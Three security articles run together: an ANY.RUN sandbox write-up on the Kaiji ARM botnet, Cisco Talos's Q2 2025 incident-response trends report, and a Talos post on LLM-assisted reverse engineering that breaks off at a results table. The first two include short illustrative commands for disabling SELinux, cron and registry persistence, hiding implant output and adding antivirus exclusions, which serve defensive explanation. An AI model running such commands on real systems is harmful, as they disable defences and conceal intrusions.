Detect ARM Malware in Seconds with Debian Sandbox for Stronger Enterprise Security 

ANY.RUN’s Interactive Sandbox provides SOC teams with the fastest solution for analyzing and detecting cyber threats targeting Windows, Linux, and Android systems. Now, our selection of VMs has been expanded to include Linux Debian 12.2 64-bit (ARM).  

With the rapid rise of ARM-based malware, the sandbox helps businesses tackle this threat through proactive analysis and early detection. 

Why ARM-based Malware is a Serious Threat to Your Company 

ARM processors are widely used in resource-constrained IoT devices, embedded systems, and even low-power servers, often deployed with weak security. These devices become prime targets for attackers looking to build massive botnets, steal resources, or gain unauthorized access. Common types of ARM-based malware include: 

  • Botnets: Turning devices into “zombies” for DDoS attacks. 
  • Backdoors: Maintaining persistent unauthorized system access. 

By expanding the capabilities to identify these threats, companies can prevent large-scale incidents in their infrastructure and reduce costs associated with downtime, recovery, and incident response. 


Launch Your First Malware Analysis in Linux Debian (ARM) VM 

The new OS is now available to all Enterprise users, unlocking deeper analysis capabilities for ARM-based threats.  

To select the Linux Debian VM, follow these simple steps:  

  1. Open ANY.RUN’s Interactive Sandbox. 
  2. Navigate to the New analysis window. 
  3. Open the Operating system dropdown menu. 
  4. Select Linux Debian 12.2 (ARM, 64-bit) from the available OS options. 
  5. Upload the file or URL you want to analyze, configure the rest of your settings, and run your analysis. 

The update further empowers your security team to detect malware and phishing early with ANY.RUN’s Interactive Sandbox: 

  • Ensure fast analysis: Accelerate triage, incident response, and threat hunting with a dedicated ARM environment for instant insights into any threat’s behavior. 
  • Cut costs: Analyze ARM-based malware alongside Windows, Android, and Linux x86 threats directly in ANY.RUN’s sandbox, eliminating the need for multiple platforms. 
  • Improve incident escalation: Gather rich, actionable data during Tier 1 analysis, enabling informed handoffs to Tier 2 and more effective mitigation of active attacks. 
  • Grow team’s expertise: Help your SOC analysts enhance their skills by analyzing real-world ARM threats, building confidence and knowledge through hands-on investigations. 

Real-World Use Case: Kaiji Botnet 

To demonstrate how ANY.RUN’s Linux Debian 12.2 (ARM, 64-bit) Sandbox operates, we analyzed a real-world sample of the Kaiji botnet, malware specifically compiled for the ARM architecture. 

Kaiji is a botnet that targets Linux-based servers and IoT devices. Once executed, it performs system reconnaissance, masks its presence, disables security mechanisms like SELinux, and ensures persistence through systemd services and cron jobs. It replaces core system utilities and hides malicious activity by filtering command output, all of which are captured inside the sandbox. 
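
For context, disabling SELinux and registering persistence on a Linux host typically come down to a handful of shell commands. The lines below illustrate the general technique only and are not extracted from this sample; the service name is hypothetical:

setenforce 0                                                         # switch SELinux to permissive for the current session
sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config   # persist the change across reboots
systemctl enable --now example.service                               # hypothetical unit name registering the payload at boot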

Let’s take a closer look at how Kaiji behaves from the moment it lands on the sandbox: 

View real case inside sandbox 

Kaiji botnet analyzed inside ANY.RUN sandbox 

Fast Detection with Instant Verdict 

In this real-world case, ANY.RUN’s Debian 12.2 ARM sandbox detected the Kaiji botnet in just 25 seconds, as shown in the top-right corner of the sandbox interface. The threat was flagged as malicious activity and accurately labeled kaiji and botnet. 

25 seconds for the detection of Kaiji botnet inside ANY.RUN’s Debian sandbox

This kind of speed delivers real value for security teams: 

  • Respond faster: A near-instant verdict means teams can act before the threat spreads. 
  • Reduce manual work: Quick detection cuts down time spent digging through logs or unclear alerts. 
  • Improve SOC efficiency: Faster detection supports lower MTTR and smarter alert triage. 
  • Stay ahead of evolving threats: With ARM-based malware on the rise, fast, reliable detection is key to staying protected. 

Full Visibility with Process Tree 

Beyond fast detection, ANY.RUN’s sandbox gives complete visibility into the attack’s behavior. On the right side of the screen, the process tree lays out every action taken by the malware. Clicking on each process reveals detailed information, from execution paths to commands and TTPs used. 

Malicious process with all the relevant TTPs displayed inside the interactive sandbox

In this Kaiji case, for example, we can see how the malware attempts to maintain persistence by modifying /etc/crontab to run the /.mod script every minute. This script keeps the malicious process running in the background even if one of the persistence methods fails, a tactic clearly visible and traceable through the sandbox’s behavioral logs. 
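
In /etc/crontab format (which includes a user field), an entry implementing this schedule would look something like the line below. This is an illustration of the technique, not the sample’s exact entry:

* * * * * root /.mod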

Kaiji botnet maintains persistence by modifying /etc/crontab 

This level of insight helps SOC teams not only detect threats quickly, but understand them deeply, supporting better response, reporting, and threat hunting. 

Track Network and File Activity in Real Time 

Just below the VM window, ANY.RUN displays all network connections and file modifications made by the malware, offering analysts a complete picture of how the threat operates. 

In this case, Kaiji’s behavior is clearly visible: the malware replaces key system utilities and intercepts user commands, passing them to the original tools while filtering the output to hide signs of infection. This is handled via the /etc/profile.d/gateway.sh script, which uses sed to remove specific keywords like 32676, dns-tcp4, and the names of hidden files from command output, a stealthy evasion technique that can be easily overlooked without deep behavioral analysis. 
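
Conceptually, this kind of output filtering behaves like a shell wrapper that pipes the real tool’s output through sed. The one-liner below is a minimal sketch of the idea using the keywords mentioned above; the sample’s actual gateway.sh is more elaborate:

netstat() { command netstat "$@" | sed -e '/32676/d' -e '/dns-tcp4/d'; }

With a definition like this loaded from a profile script, every call to netstat silently drops the lines that would expose the implant’s port and connections.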

Kaiji replaces core system utilities via the /etc/profile.d/gateway.sh script 

With this visibility, security teams can trace every move, catch hidden modifications, and build accurate IOCs for future detection and response. 

Complete Results, Ready to Investigate or Share 

Once the analysis is complete, ANY.RUN’s sandbox gives you everything you need to take the next step. The IOCs tab gathers all critical indicators, including IPs, domains, file hashes, and more, in one place, so there’s no need to jump between views or dig through raw logs. 

IOCs neatly organized inside ANY.RUN’s sandbox 

You’ll also get a clear, structured report that maps out the full attack chain from start to finish. Whether you’re documenting a case, sharing findings with your team, or enriching threat intelligence feeds, the report is built to support fast, confident action. 

Exportable sandbox report with complete attack chain overview 

This end-to-end visibility makes every investigation smoother, and every response stronger. 

About ANY.RUN 

Trusted by over 500,000 security professionals and 15,000+ organizations across finance, healthcare, manufacturing, and beyond, ANY.RUN helps teams investigate malware and phishing threats faster and with greater precision. 

Accelerate investigation and response: Use ANY.RUN’s Interactive Sandbox to safely detonate suspicious files and URLs, observe real-time behavior, and extract critical insights, cutting triage and decision time dramatically. 

Enhance detection with threat intelligence: Leverage Threat Intelligence Lookup and TI Feeds to uncover IOCs, tactics, and behavior patterns tied to active threats, empowering your SOC to stay ahead of attacks as they emerge. 

Request a trial of ANY.RUN’s services to see how they can boost your SOC workflows. 


IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Phishing remained the top method of initial access this quarter, appearing in a third of all engagements – a decrease from 50 percent last quarter. Threat actors largely leveraged compromised internal or trusted business partner email accounts to deploy malicious emails, bypassing security controls and gaining targets’ trust. Interestingly, the objective of the majority of observed phishing attacks appeared to be credential harvesting, suggesting cybercriminals may consider brokering compromised credentials as simpler and more reliably profitable than other post-exploitation activities, such as engineering a financial payout or stealing proprietary data.   

Ransomware and pre-ransomware incidents made up half of all engagements this quarter, similar to last quarter. Cisco Talos Incident Response (Talos IR) responded to Qilin ransomware for the first time, identifying previously unreported tools and tactics, techniques, and procedures (TTPs), including a new data exfiltration method. Our observations of Qilin activity indicate a potential expansion of the group and/or an increase in operational tempo in the foreseeable future, warranting this as a threat to monitor. Additionally, ransomware actors leveraged a dated version of PowerShell, PowerShell 1.0, in a third of ransomware and pre-ransomware engagements this quarter, likely to evade detection and gain more flexibility for their offensive capabilities.

Actors leverage compromised email accounts for phishing attacks aimed at credential harvesting   

As mentioned above, threat actors used phishing for initial access in a third of engagements this quarter, a decrease from 50 percent last quarter when it was also the top observed initial access technique. However, last quarter featured a dominant voice phishing (vishing) campaign deploying Cactus and Black Basta ransomware that was significantly less present this quarter, potentially contributing to this decline.  

Threat actors largely leveraged compromised internal or trusted business partner email accounts to send malicious emails, which appeared in 75 percent of engagements where phishing was used for initial access. Using a legitimate trusted account affords an attacker numerous advantages, such as potentially bypassing an organization’s security controls as well as appearing more trustworthy to the recipient. For example, in one phishing engagement, the targeted organization’s users were victims of a phishing campaign sent from the compromised email address of a legitimate business partner. The phishing emails leveraged malicious links directing victims to a fake Microsoft O365 login page that prompted visitors to authenticate with MFA, likely so the attacker could steal users’ credentials and session tokens. 

We assess that credential harvesting was the end goal in the majority of phishing attacks this quarter, such as in the example highlighted above. Though the tactic of leveraging compromised valid email accounts is often associated with business email compromise (BEC) attacks, this observation suggests cybercriminals may consider brokering compromised credentials to be more reliably profitable than attempting to manipulate a target into making a financial payout. Further, not including a financial request in the email body likely makes an email less suspicious to a victim, potentially raising the chances of a successful attack. In one engagement, an attacker successfully compromised a user’s email account after the user clicked a link within a phishing email and provided their credentials to the phishing site. The adversary proceeded to send multiple internal spear phishing emails as the compromised user with a link to an internal SharePoint link, which then directed to a credential harvesting page that successfully tricked approximately a dozen additional users into entering their credentials.

Ransomware trends 

Ransomware and pre-ransomware incidents made up half of all engagements this quarter, similar to last quarter. Talos IR observed Qilin and Medusa ransomware for the first time, while also responding to previously seen Chaos ransomware. 

Qilin ransomware activity showcases previously unreported TTPs and suggests increased operational tempo    

We responded to a Qilin ransomware incident for the first time this quarter, identifying tools and TTPs that have not been previously publicly reported. Specifically, we observed the operators leveraging a suspected custom compiled encryptor with hardcoded victim user credentials, Backblaze-hosted command and control (C2) infrastructure, and the file transfer tool CyberDuck, an exfiltration method not previously associated with this threat actor or its affiliates. The threat actors likely leveraged stolen valid credentials to gain initial access, then used a combination of commercial remote monitoring and management (RMM) solutions to facilitate lateral movement and data staging, including TeamViewer, VNC, AnyDesk, Chrome Remote Desktop, Distant Desktop, QuickAssist, and ToDesk. To ensure persistent access until encryption was completed, the actors created an AutoRun entry in the SOFTWARE registry hive on each infected system to trigger the ransomware execution each time the system was rebooted, and a scheduled task to silently relaunch Qilin at every new logon. These attack techniques ultimately led to a widespread infection requiring a complete rebuild of the Active Directory (AD) domain and password resets for all accounts.
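
As a generic illustration of these two persistence mechanisms (the value names and paths below are hypothetical, not Qilin’s actual artifacts):

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Encryptor /t REG_SZ /d "C:\ProgramData\payload.exe"
schtasks /create /tn "Updater" /tr "C:\ProgramData\payload.exe" /sc onlogon /rl highest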


Looking forward: Our analysis of Qilin activity this quarter indicates a potential expansion of the group of affiliates and/or an increase in operational tempo. In addition to this engagement, we saw additional Qilin ransomware activity kick off this quarter, but did not include it in our Q2 statistics as analysis was still ongoing after the quarter ended. Further, posts on the group’s data leak site show a doubling of disclosures since February 2025, suggesting this is a ransomware threat to monitor for the foreseeable future.


The North Korean state-sponsored cyber group Moonstone Sleet reportedly began deploying Qilin ransomware last February, and some security firms believe that affiliates from the RansomHub ransomware-as-a-service (RaaS) — whose data leak site went offline in early April 2025 — have also joined Qilin. After the RansomHub data leak site went offline, Qilin members were observed engaging with active RansomHub members and advertising an updated version of Qilin, likely in attempts to recruit new affiliates and expand operations.

Ransomware actors leverage dated version of PowerShell to evade detection   

In a third of ransomware and pre-ransomware engagements this quarter, threat actors leveraged PowerShell 1.0, an older version of the scripting language, whose most up-to-date release is version 7.4. Using this insecure version gives attackers numerous potential advantages, as it lacks security features that newer versions have built in, such as script block logging, which logs the content of executed scripts, and transcription logging, which records all input/output in PowerShell sessions. It also lacks the Antimalware Scan Interface (AMSI), which allows antivirus tools to scan PowerShell code before it’s executed. Additionally, some endpoint detection and response (EDR) tools are designed to monitor behaviors typical of newer PowerShell versions, potentially enabling attackers to evade signature- and behavior-based detections.   

We observed threat actors leveraging PowerShell 1.0 for both defense evasion and discovery in ransomware and pre-ransomware engagements this quarter. For example, in a Medusa ransomware engagement, we saw the adversary using PowerShell 1.0 to add the folder “C:\Windows” to the exclusion list of the victim’s antivirus (AV) solution, meaning the AV would not scan or monitor anything under the core operating system directory, severely compromising defenses. In a pre-ransomware engagement, the adversary leveraged PowerShell 1.0 to bypass script execution policy restrictions with the command “-ExecutionPolicy Bypass” and monitor peer-to-peer file transfers in the victim network. Ultimately, this tactic can make adversaries’ activity quieter from a logging perspective and give them more flexibility in terms of what they can perform on the system. Therefore, organizations should enforce use of PowerShell 5.0 or greater on all systems.
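
For illustration: if the AV in the Medusa case had been Microsoft Defender (an assumption on our part; the report does not name the product), the exclusion could be added with a single cmdlet, while defenders can blunt downgrade abuse by removing the legacy engine (the optional feature below removes the PowerShell 2.0 engine, the usual downgrade target on modern Windows):

Add-MpPreference -ExclusionPath "C:\Windows"
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root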

Targeting 

Education was the most targeted industry vertical this quarter, a shift from last quarter when we did not see any engagements targeting education organizations. This trend is in line with observations documented in our 2024 Year in Review report, where we noted that the education sector saw the most ransomware attacks during the month of April, with a high volume of attacks in May and June as well. Additionally, education was also the most targeted vertical in FY24 Q3 and FY24 Q4.


Initial access 

As mentioned, the most observed means of gaining initial access was phishing, followed by valid accounts, then exploitation of public-facing applications and brute force attacks.


Recommendations for addressing top security weaknesses


Implement properly configured MFA and other access control solutions 

Over 40 percent of engagements this quarter involved MFA issues, including misconfigured MFA, lack of MFA, and MFA bypass. In multiple engagements, threat actors capitalized on MFA products that were configured to enable self-service, adding attacker-controlled devices as authentication methods to bypass this defense and establish a path of persistence. Talos IR recommends monitoring and alerting on the following for effective MFA deployment: abuse of bypass codes, registration of new devices, creation of accounts designed to bypass or be exempt from MFA, and removal of accounts from MFA.  

Configure robust and centralized logging capabilities across the environment  

A quarter of engagements involved organizations with insufficient logging capabilities that hindered investigative efforts. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. To address this issue, Talos IR recommends organizations implement a Security Information and Event Management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will contain the original logs to support a forensics investigation. Further, organizations should deploy a web application firewall (WAF) and enable flow logging for all endpoints across the environment for real-time threat monitoring and detection, which can facilitate a swifter response to potential incidents and enhanced context for investigative efforts. As highlighted last quarter and in a recent blog, a quick response time is a key variable that affects the severity and impact of cyber attacks. 

Protect endpoint security solutions  

Finally, in a slight increase from last quarter, a quarter of incidents involved organizations that did not have protections in place to prevent tampering with EDR solutions, enabling actors to disable these defenses. Talos IR strongly recommends ensuring endpoint solutions are protected with an agent or connector password and customizing their configurations beyond the default settings. Additional recommendations for hardening EDR solutions against this threat can be found in our 2024 Year in Review report.

Top-observed MITRE ATT&CK techniques  

The list below covers the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements, grouped by tactic. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note that this is not an exhaustive list.  

Key findings from the MITRE ATT&CK framework include:  

  • Adversaries leveraged a wider variety of techniques for credential access this quarter compared to last quarter, including kerberoasting, brute force attacks, credential harvesting pages, OS credential dumping, and adversary-in-the-middle attacks.
  • This was the second quarter in a row where phishing was the top initial access technique, with threat actors leveraging both vishing and malicious links.

Reconnaissance (TA0043) 
  • T1593 Search Open Websites/Domains: Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. 
  • T1595.002 Active Scanning: Vulnerability Scanning: Adversaries may run vulnerability scans against an organization’s public-facing infrastructure to identify potential vulnerabilities to exploit. 

Initial Access (TA0001) 
  • T1598.004 Phishing for Information: Spearphishing Voice: Adversaries may use voice communications to elicit sensitive information that can be used during targeting. 
  • T1598.003 Phishing for Information: Spearphishing Link: Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. 
  • T1078 Valid Accounts: Adversaries may use compromised credentials to access valid accounts during their attack. 
  • T1190 Exploit Public-Facing Application: Adversaries may exploit a vulnerability to gain access to a target system. 
  • T1110 Brute Force: Adversaries may systematically guess users’ passwords using a repetitive or iterative mechanism. 

Execution (TA0002) 
  • T1204 User Execution: Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious file or link. 
  • T1059.001 Command and Scripting Interpreter: PowerShell: Adversaries may abuse PowerShell to execute commands or scripts throughout their attack. 
  • T1047 Windows Management Instrumentation: Adversaries may use Windows Management Instrumentation (WMI) to execute malicious commands during the attack. 
  • T1569 System Services: Adversaries may abuse system services or daemons to execute commands or programs. 

Persistence (TA0003) 
  • T1556 Modify Authentication Process: Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. 
  • T1078 Valid Accounts: Adversaries may obtain and abuse credentials of existing accounts, potentially bypassing access controls placed on various resources on systems within the network. 
  • T1053 Scheduled Task/Job: Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. 

Privilege Escalation (TA0004) 
  • T1484 Domain or Tenant Policy Modification: Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. 
  • T1055 Process Injection: Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. 

Defense Evasion (TA0005) 
  • T1562.001 Impair Defenses: Disable or Modify Tools: Adversaries may disable or uninstall security tools to evade detection. 
  • T1070 Indicator Removal: Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. 
  • T1133 External Remote Services: Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. 
  • T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control: Adversaries may bypass UAC mechanisms to elevate process privileges on a system. 

Credential Access (TA0006) 
  • T1003 OS Credential Dumping: Adversaries may dump credentials from various sources to enable lateral movement. 
  • T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting: Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to brute force. 
  • T1110 Brute Force: Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. 


Using LLMs as a reverse engineering sidekick

  • This research explores how large language models (LLMs) can complement, rather than replace, the efforts of malware analysts in the complex field of reverse engineering. 
  • LLMs may serve as powerful assistants to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis. 
  • We will showcase practical applications of LLMs in conjunction with essential tools like Model Context Protocol (MCP) frameworks and industry-standard disassemblers and decompilers, such as IDA Pro and Ghidra. 
  • Readers will gain insights into which models and tools are best suited for common challenges in malware analysis and how these tools can accelerate the identification and understanding of unknown malicious files. 
  • We also show how some common hurdles faced when using LLMs may influence the results, like cost increases due to tool usage and limitations of input context size in local models.

Talos’ suggested approach 


As the adoption of LLMs accelerates across industries, concerns about their potential to replace human expertise have become widespread. However, rather than viewing them as a threat to human expertise, we can consider LLMs powerful tools to help malware researchers in our work. 

With this research, we seek to show that even with low-cost tools and hardware, a malware researcher can take advantage of this technology to improve their work.  

This blog covers the different client applications available for interacting with LLMs and disassemblers, the features to consider when choosing the best language model, and the available plugins for integrating these applications into a solid framework to help during a malware analysis session. 

For our tests, we decided to use a setup composed of an MCP server that integrates with IDA Pro and an MCP client based on VSCode. With this stack, we show how MCP servers can be used to help the language model execute tasks based on user input or in reaction to information found in the malicious code. 

This blog also provides a step-by-step guide on how to set up your environment to achieve a basic setup to use an LLM with a local model running on your GPU.  

Introduction to MCP 

The Model Context Protocol (MCP) is an open protocol that standardizes how applications provide context to LLM clients and models. Tools and data sources made available by MCP servers provide the context, and the LLM model can choose which tool or data source to access based on user request or autonomously select it during runtime.  

MCP servers implement tools using code and a description instructing the LLM on how to use each tool. The code can implement any kind of task, be it accessing API integration, file or network access, or any other automation necessary.
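
To make this concrete, below is a minimal, self-contained sketch of an MCP server exposing a single tool, written against the official MCP Python SDK (assumes pip install mcp). It is loosely modeled on the convert_number tool referenced in the prompts later in this post; the real tool’s implementation and signature may differ:

from mcp.server.fastmcp import FastMCP

# Create a named MCP server; the name is what clients display to the user.
mcp = FastMCP("demo-tools")

@mcp.tool()
def convert_number(value: str, base: int) -> str:
    """Convert a number written in the given base (e.g., 16 for hex) to decimal."""
    return str(int(value, base))

if __name__ == "__main__":
    mcp.run()  # defaults to the stdio transport; SSE is also supported

Note that the docstring doubles as the tool description sent to the client, which is how the model learns when and how to invoke the tool.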

Figure 1. Diagram showing how an MCP server connects to other components in a typical setup.

These components can all be installed on the same or separate machines as needed. For example, the local LLM model may run on a separate server with better GPUs, while IDA Pro and the MCP server may sit on a different machine with more restricted access, since it is used to handle malware.  

Choosing the right tools for the trade 

A user interacts with an MCP server through an MCP client, which serves as the main interface to query the LLM model, exchange data with MCP servers and display this data back to the user. These clients can be any application which supports the MCP protocol, such as the Claude.AI Desktop or Visual Studio Code (VSCode), using any of the MCP client extensions available in their marketplace.  

For this blog, we use VSCode with the Cline MCP client extension, but any of the many extensions currently available, such as Roo Code (referenced later in this post), can be used. 

For local implementations, the inference engine is another choice to make. There are several open-source engines with different levels of performance and usage complexity. Some are Python frameworks like vLLM; others, like Llama.cpp or Ollama, are written in C++ with Python bindings and can be deployed as full servers contacted via a REST API. They all have advantages and disadvantages, and a comparison between them is beyond the scope of this article. For our experiments, we decided to use Ollama, mainly for its simplicity of use. 

Model selection criteria 

The next component needed is an LLM. These can be either a cloud-based model or a locally running model. Most of the MCP clients support a wide range of cloud-based services and have pre-configured settings for them. For locally running models, using the Ollama inference engine with one of their supported models is one of the most compatible solutions. 

When choosing which model to use with MCP servers, some features need to be taken into consideration, due to the way the MCP client interacts with the model and the MCP servers. 

First, the model must support prompts with structured instructions. This is how the client will inform the model about what MCP tools are available, what they are used for, and the template syntax for using them. 

The model must also support large input context windows, so it’s able to parse large code bases and follow-up analysis. This is needed so the client can pass all the necessary information to the model in the same query.  

When the MCP client sends a query to the model, it puts into a single prompt all the information provided by the MCP server about what tools are available and how each one is used, generic instructions optimized for the model, and the prompt entered by the user. If it is a follow-up query, any output from previous commands is also added to the prompt, like the full decompilation of a function or a list of strings. As a result, this can quickly make the prompt reach the maximum input context the model or the inference engine supports. 

This is less of a problem for cloud-based models, as it mainly influences the price of each request, and more of a problem for local models using the Ollama inference engine, which may truncate the prompt and provide invalid responses since it lacks all the context.  

Due to these restrictions, models that are not trained specifically to handle tool usage or structured instructions may not be ideal to use with MCP servers and may cause hallucinations during code analysis. 

For our study, we use the Ollama inference engine with Devstral:24b as the local LLM option and Anthropic’s Claude 3.7 Sonnet (claude-3-7-sonnet-20250219) as the cloud-based model, as these models are specifically targeted at tool use and code analysis. Alternative models may be used in case of hardware restrictions, cost effectiveness, or user preference.  

Some other points that need to be considered when choosing a local vs cloud-based model are: 

  • Cost: Cloud-based models tend to charge for API access based on the number of tokens used in input queries and their responses. Analyzing large files with follow-up questions while keeping the context may quickly increase the cost associated with each prompt. On the other hand, local models tend to be slower and use the GPUs at maximum power, increasing the hidden cost of energy used to keep the machine up for the extension of the analysis. Local models also have an upfront cost of acquiring the necessary hardware to run the model, which does not exist for cloud-based models. 
  • Privacy and confidentiality: When using a cloud-based service, it is assumed that all information about the file being analyzed will be sent to the cloud LLM provider. Depending on the type of file being analyzed, this could break confidentiality rules imposed by employers or customers requesting the analysis.  
  • Speed: LLMs are processor- and memory-intensive applications. While running an LLM on a local single-GPU machine may have advantages in terms of confidentiality and cost, it is a much slower process than running the same on a cloud-based service. The same analysis which may take minutes to run on a cloud-based LLM may take several hours to run on a local LLM. Adding to this problem, once the model and context exceed the available GPU memory, the LLM may switch to using the CPU instead of (or in addition to) the GPU. This makes the process even slower. 

IDA Pro MCP servers 

The MCP server setup is usually composed of two parts. The first is the plugin that runs inside the disassembler and performs the actions requested by the user, such as renaming functions and variables, retrieving the disassembly or decompilation of a function, or any other tasks implemented by the plugin. These functions are implemented as remote procedure calls (RPCs), which are made available to the client via the MCP server as “tools.” 
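
As a rough illustration of the plugin side (not the actual ida-pro-mcp code), a rename handler can be a thin wrapper over the IDAPython API, registered with the RPC layer as a tool:

import ida_name

def rename_function(address: int, new_name: str) -> bool:
    """Rename the item at `address`; exposed to the MCP client as a tool."""
    # SN_CHECK validates the new name and fails cleanly on conflicts.
    return ida_name.set_name(address, new_name, ida_name.SN_CHECK)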

The second component is the MCP server itself, which interacts with the plugin and waits for instructions from the MCP client. This server uses the Server-Sent Events (SSE) protocol to communicate with the client and expose the tools configured in the plugin. Each MCP server implements its own set of tools, so it’s up to the user to choose the one that best fits their needs; several exist for use with IDA Pro or Ghidra. 

To summarize how we set up our environment for this research, this is what we are using: 

  • Local model with Ollama and Devstral 
  • Cloud-based LLM using Anthropic’s Claude Sonnet 3.7 
  • MCP Server by Duncan Ogilvie (Mrexodia) with its plugin configured in IDA Pro 
  • Installed and configured Cline plugin in VSCode 

For our analysis, the setup utilized was a desktop machine running an AMD Ryzen 7 9800X3D at 4.7 GHz, with 64 GB of DDR5-6000 RAM, a 3 TB SSD, and an NVIDIA 5070 Ti GPU with 16 GB of VRAM, which can be considered a medium/high-end consumer desktop. 

Using LLM to analyze a real-world sample 

Using the setup previously defined, let’s analyze a malicious file and compare the results between human analysis, local LLM and cloud-based LLM. The sample we are going to use is in fact an old IcedID sample which has been extensively reversed and documented using Hex-Rays’s Lumina database. This way we have a common base to compare the results from different LLMs.  

It is possible that these analysis results went into the training data of both models and influenced the results, but our intention is to compare how both LLMs fare against each other. 

  • 7412945177641e9b9b27e601eeda32fda02eae10d0247035039b9174dcc01d12 

This is a small sample, with about 37 defined functions, which is important to consider when analyzing the results. A bigger sample with hundreds of functions would have a different impact on the analysis, as we will discuss later.  

Creating the prompts 

Perhaps the most important step in making efficient use of an LLM is defining the right prompts to query the model. A good prompt will not only give you a better analysis result but may also make the query less expensive and faster to finish, while reducing the chances of hallucinations. 

For this example, we used a prompt template suggested by Mrexodia on his GitHub page, with some improvements and changes, after some experimentation, to cover different types of analysis. Our intention was to use the exact same prompt for both the local and cloud-based LLMs, and to cover three different situations which may be common during malware analysis: 

  • Top-down analysis from the program entry point 
  • Figuring out what a specific function does and how it is used by the application 
  • Analyze all unknown functions and rename them to make it easier to understand the rest of the code 

To cover these examples, we created three prompts (Figures 2 – 4), which were used for all cases discussed.  

Please note that these prompts are not optimized and can most definitely be further improved. For example, the local model would benefit from smaller prompts with fewer steps to execute, to keep the input context small, while the cloud-based model benefits more from prompts including all necessary steps, in concise form, to avoid the extra cost of submitting several small prompts and their associated MCP instructions. However, in this case, all three prompts needed to be generic enough to be used in all our cases without changes to create a fair comparison.  

Another important note is that we do not explicitly say in the prompt that the file was malicious, as this caused the model to assume every function was malicious, biasing its analysis. 

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server called "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- Start from the function named "StartAddress", which is the real entry point of the code
- If this function call others, make sure to follow through the calls and analyze these functions as well to understand their context
- If more details are necessary, disassemble or decompile the function and add comments with your findings
- Inspect the decompilation and add comments with your findings to important areas of code
- Add a comment to each function with a brief summary of what it does 
- Rename variables and function parameters to more sensible names
- Change the variable and argument types if necessary (especially pointer and array types)
- Change function names to be more descriptive, using VIBE_ as prefix. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed!
- When you finish your analysis, report how long the analysis took
- At the end, create a report with your findings. 
- Based only on these findings, make an assessment on whether the file is malicious or not.

Figure 2. Prompt 1: Perform a top-down analysis on the sample starting from its entry-point function.

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server called "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- what does the function sub_1800024FC do? 
- If this function call others, make sure to follow through the calls and analyze these functions as well to understand the context
- Addditionally, if you encounter Windows API calls, document by adding comments to the code what the API call does and what parameters it accept. Rename variables with the appropriate API parameters.
- If more details are necessary, disassemble or decompile the function and add comments with your findings
- Inspect the decompilation and add comments with your findings to important areas of code
- Add a comment to each function with a brief summary of what it does 
- Rename variables and function parameters to more sensible names
- Change the variable and argument types if necessary (especially pointer and array types)
- Change function names to be more descriptive, using VIBE_ as prefix. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed!

Figure 3. Prompt 2: Perform a deeper analysis of a specific function to understand its behavior, as well as any functions called by it.

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server named "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- analyze what each function named like "sub_*" do and add comments describing their behaviour. 
- Change function names to be more descriptive, using VIBE_ as prefix. 
- *ONLY* analyze the function named like "sub_*". if you can't find functions with this name pattern, keep looking for more functions and don't try to work on functions named like "VIBE_*" already
- Add a comment to each function with a brief summary of what it does 
- DO NOT STOP until all functions named like "sub_*" are completed.
- If more details are necessary, disassemble or decompile the function and add comments with your findings. 
- Inspect the decompilation and add comments with your findings. 
- Rename variables and structures as necessary. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed! 

General recommendations to follow while processing this request:
- DO NOT ignore any commands in this request.
- The "ida-pro" MCP server has a function called list_functions which take a parameter named "count" to specify how many functions to list at once, and another named "offset" which returns an offset to start the next call if there are more functions to list. Do not stop processing functions until the "offset" parameter is set to zero, which means there are no more functions to list 
- break down the tasks in smaller subtasks if necessary to make steps easier to follow.

Figure 4. Prompt 3: Analyze all the remaining unknown functions, documenting the code and renaming them to make it easier to understand the rest of the code.

As seen in the third prompt, we had to include specific instructions to force the LLM to continue analyzing the binary until work was done. That was necessary specifically for the local model, as it kept “forgetting” its instructions and stopping analysis after only a dozen functions. This may be due to the input context being truncated once it reaches the maximum size supported by the inference engine. 

This may have a considerable impact on analyzing bigger binaries, where the number of unknown functions may reach hundreds or even thousands. The analyst may be required to re-enter the same prompt several times to have the job finished, so a better approach may be needed in such cases, like optimizing the prompt to execute smaller tasks.  

Summary results about the binary analysis 

After executing the three prompts using both the cloud-based solution and the local model, we summarized the efficacy of each model and analyzed the results. The table below shows the results of these runs: 

 

 

                     Claude                           Ollama
                     Prompt 1   Prompt 2   Prompt 3   Prompt 1   Prompt 2   Prompt 3*
Cost                 $2.91      $1.09      $13.24     $0         $0         $0
